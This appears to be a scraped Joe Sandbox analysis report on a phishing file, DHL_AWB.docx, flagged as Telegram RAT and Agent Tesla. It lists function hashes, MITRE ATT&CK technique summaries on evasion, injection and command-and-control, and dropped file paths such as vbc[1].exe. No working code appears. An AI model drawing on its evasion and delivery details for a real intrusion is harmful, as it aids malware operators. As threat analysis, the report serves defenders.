Instruction Fuzzy Hash: 7301F231008340AAE7109B26EC84B67BFD8EF55364F29C55BEE045A382C778D840CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 003826D1 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f2379b5d27698cb1590d53b668007b24dc901a0b026b3fb21d8e371062bcd14
Instruction ID: b7bda1966f8db55adec223e1757d57646043f65a70146bed5e4bddb11e29e18c
Opcode Fuzzy Hash: 3f2379b5d27698cb1590d53b668007b24dc901a0b026b3fb21d8e371062bcd14
Instruction Fuzzy Hash: F311E031D1420ACFDB10EFB9E84848CFBB5FF48314B2186A9E45567222EB30A999CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0072017A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eda3ec9ce31c3976075ddd19287d3f058c5402dd4da4e1956091289d8e57ce4
Instruction ID: 6afd06b3b1a9c6055f3ccbcef0eb1a885f68978ead3021c524f6da08254bca53
Opcode Fuzzy Hash: 4eda3ec9ce31c3976075ddd19287d3f058c5402dd4da4e1956091289d8e57ce4
Instruction Fuzzy Hash: 95014C74948268CFCB50CF64DC84BECBBB4BB09304F2485D6D149AB292D7B49AC1CF90

Uniqueness

Uniqueness Score: -1.00%

Function 001DD1C0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965659311.00000000001DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1dd000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77a1404c436555504ab0aa9842fe667dedc0da02a56567b3b3ba47d44a45a674
Instruction ID: bc31f2b4dc8c35f324e70004e234dc70e6da09b7ce161da60e5400c0b6ca38be
Opcode Fuzzy Hash: 77a1404c436555504ab0aa9842fe667dedc0da02a56567b3b3ba47d44a45a674
Instruction Fuzzy Hash: A6F06271404744AAE7108A15E8C4B67FF98EF95724F28C55AED085B292C378DC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00720219 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 301348ab1516f35445f684ff144fe1866c2bc895a8b88a6baf00b156bb1c507e
Instruction ID: 2024a47109f509db4887564d83c45527a97580853f94e6e94100e9c16615962d
Opcode Fuzzy Hash: 301348ab1516f35445f684ff144fe1866c2bc895a8b88a6baf00b156bb1c507e
Instruction Fuzzy Hash: 660104709002288FCBA4CF58C884BEDBBB4AB09300F2480A6D40DE7252D7389EC4CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0072037A Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca576f225acccc607845ae0cb9c9508f7a19b0960c1302788824cf16c438698
Instruction ID: 83e52219d6326678ed6622b540ad3a4f1c4bb72d6c35fbec8365b6970156f5aa
Opcode Fuzzy Hash: 1ca576f225acccc607845ae0cb9c9508f7a19b0960c1302788824cf16c438698
Instruction Fuzzy Hash: 4E01E470D08128DFCB64CFA8C944BECBBB5EF49304F1480A9D019A7292C736AE89DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00720C9F Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 492a37d3b7b6c890a2492af2ae1e4a2a0f0bfe59890fca150fcb8ef4fd21cfca
Instruction ID: 5835fc94db4a088bc7bf2c6541f7da78e1f025c12b48898dc721f6c6b8c6cf72
Opcode Fuzzy Hash: 492a37d3b7b6c890a2492af2ae1e4a2a0f0bfe59890fca150fcb8ef4fd21cfca
Instruction Fuzzy Hash: 81F0B7B8E0922CCFCB54DF64E9452ECB7B5FF0A301F10A59AD51EA6202D7345982DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00389407 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5492d12b643df626ab88b06a08ca3763d691341389ecbf6b622b6cbad7cfc3d7
Instruction ID: 6ffaf6d204f2da770c96871bfd2b038cc4215c7263fec0d06ee5c788a90e0343
Opcode Fuzzy Hash: 5492d12b643df626ab88b06a08ca3763d691341389ecbf6b622b6cbad7cfc3d7
Instruction Fuzzy Hash: 0BF05E3090D2C99EC702DBF499557A97FA29B47300F1844EAC0159B6A3C7714A85DB26

Uniqueness

Uniqueness Score: -1.00%

Function 007200F7 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9207edd32e914f7402480b967bcfd77d6c1dac943765e7f750f79f9125fd35da
Instruction ID: 9b4cd31bceeb0ce8309e5a00fe8d9c938fbf89e734dfa9fe427e65628b897d63
Opcode Fuzzy Hash: 9207edd32e914f7402480b967bcfd77d6c1dac943765e7f750f79f9125fd35da
Instruction Fuzzy Hash: B0F0C470D042A98FDB60CF64C980ADCB7B5BF99300F1042EA950DAB211EB705AC4DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00380448 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c5f05350aea94300b76f7bc4745e66fda3900bef76a20f830f87b1b30c914ca
Instruction ID: b5f976b6b4c45bd5f59516a23045a403d9c85fa05148136a5a8747aeec691f3e
Opcode Fuzzy Hash: 1c5f05350aea94300b76f7bc4745e66fda3900bef76a20f830f87b1b30c914ca
Instruction Fuzzy Hash: 17E04FB09412089BCB58FFF0D95266EB2A8EB42208F2159BC5609A32A1DF354E40E759

Uniqueness

Uniqueness Score: -1.00%

Function 00720869 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e8e7f075b62b0c3acd54fd563f9f716a6df59445cd5053c34e889579c0ab119
Instruction ID: a2ecf1d1241ab822b7da1df362212abe32806884c1e5fa4311d8f5ce91f8c7d7
Opcode Fuzzy Hash: 4e8e7f075b62b0c3acd54fd563f9f716a6df59445cd5053c34e889579c0ab119
Instruction Fuzzy Hash: FEF0F835908228DFCF24CF64D9487ECBBB9AB4E304F2440DAC149622A2C3395ED5DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00720211 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9bf186b37ab11a67625009d0ea078fff9925595d7fa07310950aa20e5148ff
Instruction ID: 6433e463c527e25ab45ad63465af24ae86d4fbac63904c2a3921bda8a868be7c
Opcode Fuzzy Hash: 8a9bf186b37ab11a67625009d0ea078fff9925595d7fa07310950aa20e5148ff
Instruction Fuzzy Hash: A8F01538A08218CFDB54CF95D890BECBBB9BB88310F2490A99149AB292C6355A81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00720CEF Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ff408a9b678dd9c2b4b1388fe975dbc057339f962025cf2055dbbf36461c5c
Instruction ID: de9a1109f007c3cd6e74add9af71a8a0f450af46101c47546e9751e1e7e04275
Opcode Fuzzy Hash: 55ff408a9b678dd9c2b4b1388fe975dbc057339f962025cf2055dbbf36461c5c
Instruction Fuzzy Hash: 7BE0C97498A228CFCB14DB64D9646ECB7B5BF4A300F1065DAC51A96252CB355984CE60

Uniqueness

Uniqueness Score: -1.00%

Function 00720C88 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2255c4c0e7ca99d18e290ff5d411f85eb2db00f870cd30457399bcedc10e5d9
Instruction ID: d511411aa40b120f3422aae94b3853a75744bd1b392481fc33c0dc47eb6939be
Opcode Fuzzy Hash: e2255c4c0e7ca99d18e290ff5d411f85eb2db00f870cd30457399bcedc10e5d9
Instruction Fuzzy Hash: E8E0ED7098A228CFCB14DB64D9645EC7375AF4A300F1054DAC91A96293C7355984DE60

Uniqueness

Uniqueness Score: -1.00%

Function 00389418 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db283d40b89173fdc93d57b0d09178e64ba64d03c22fe67dafcc67dec063ba0
Instruction ID: 9bd17e4a07cc66888bc1fea0a764b968c7a42c41e2739dd445a033522e04e2af
Opcode Fuzzy Hash: 0db283d40b89173fdc93d57b0d09178e64ba64d03c22fe67dafcc67dec063ba0
Instruction Fuzzy Hash: 19E04F30D04388DFCB01EBF599487AD7BAA9746705F0884AAD4149B291DB715A84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00383A89 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4a85e9fbd173d9b2285afb9aa1871f695d7f5f063618b7f989f37676a384e3f
Instruction ID: 55803e38ad883f69845563c42335fe4ee143b202c903559fe04b84b2ecf2b577
Opcode Fuzzy Hash: d4a85e9fbd173d9b2285afb9aa1871f695d7f5f063618b7f989f37676a384e3f
Instruction Fuzzy Hash: 39E0263120C7C04FC316E718981488DBBB29ED222134A8DAFE080DB1B3C7B44C898393

Uniqueness

Uniqueness Score: -1.00%

Function 00383F5D Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd49faf0197a842bd52a31e8468cad47f2d2ebdeeac1481d09c954bc282cdaa
Instruction ID: 9a68c7b1373cc30dcbf50b909e31b39cdf7ac5085bce1e47961676dab5ab88fc
Opcode Fuzzy Hash: 6cd49faf0197a842bd52a31e8468cad47f2d2ebdeeac1481d09c954bc282cdaa
Instruction Fuzzy Hash: 94E08620F08305DBDB1977B0441923E21A2AB44601B13046DD203CFB90EF74CD418B92

Uniqueness

Uniqueness Score: -1.00%

Function 003890D8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 577e7fcb70bf53e86e602d40a67594b413171fc01f070ebfc432b265ecae3e07
Instruction ID: 7de5c5c5d5d50d28c5fd537f00a7cf170f7c244858dfa7608aacb91ce6b56214
Opcode Fuzzy Hash: 577e7fcb70bf53e86e602d40a67594b413171fc01f070ebfc432b265ecae3e07
Instruction Fuzzy Hash: 06D05E3100E3D08FC7128BF498957E87FB41B03205F1E84C6C495975A3C7550086DF22

Uniqueness

Uniqueness Score: -1.00%

Function 003890E8 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb3fa60ee34e5c75f066f7bca6d4d737a460af9e1823d730e0a202d3350850f
Instruction ID: 31f814facf6591ee6f9ed08f5dbf21eb8fc885e343069b08a45c303fefdca9f0
Opcode Fuzzy Hash: ecb3fa60ee34e5c75f066f7bca6d4d737a460af9e1823d730e0a202d3350850f
Instruction Fuzzy Hash: 02B092300097588BC715A7D5A9887BAB3EC674130AF4C9462D60C06AA2CBA165D5DEA6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00700960 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966196641.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_700000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2a4b2cc82d2e3b2125481b3b49e52ee89b6fab6ad57e2784f4eb80e4d5704d1
Instruction ID: 950fac79fb5ebe890ad1f0431cd783e1e60434daee55daa06c88bd0eadc82eb1
Opcode Fuzzy Hash: b2a4b2cc82d2e3b2125481b3b49e52ee89b6fab6ad57e2784f4eb80e4d5704d1
Instruction Fuzzy Hash: 70413EB1E016588BEB68CF6B8C40789FAF7AFC9310F14C1BA880DAB255DB354995CF41

Uniqueness

Uniqueness Score: -1.00%

Function 0038962F Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.965725439.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 684933b79c39bbe717d8c978a54e405ac4a2de9e996da88a4af4945fcf7cedcf
Instruction ID: bd2226ad913c7ae533696eefd1f31482a63560054abb90490d3e946ed244f8e8
Opcode Fuzzy Hash: 684933b79c39bbe717d8c978a54e405ac4a2de9e996da88a4af4945fcf7cedcf
Instruction Fuzzy Hash: 9D5192B0D01669CFEB68CF66CC44799BAF2AFC8304F14C1EAD40DA6255EB750A95CF10

Uniqueness

Uniqueness Score: -1.00%

Function 00720048 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.966221550.0000000000720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_720000_vbc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0630df1f6de052392525c5068eb5db3b3eec7caf4afa957cdaecf3c1f68542b
Instruction ID: 3cfc1ab3e4655634031359772d2f47c59106bb13f62975338d480c9b613a1339
Opcode Fuzzy Hash: b0630df1f6de052392525c5068eb5db3b3eec7caf4afa957cdaecf3c1f68542b
Instruction Fuzzy Hash: 1D119971E046688BEB68CF6B9C447D9FAF7ABC9300F14C0BA991CA6215DB7419858E90

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL_AWB.docx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{32AF6775-ED8D-404B-A66E-CD25BD6BBD8D}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{F4637C4C-84C5-48D5-B5F6-DBF781800F91}.FSD

C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc_200[1].doc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\125384CE.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4C4AC313.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67C004A6.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\694BA9C1.doc

Windows Analysis Report
DHL_AWB.docx

Function 03640666 Relevance: 4.6, APIs: 3, Instructions: 71
COMMON

Function 036406B9 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Function 036406E7 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON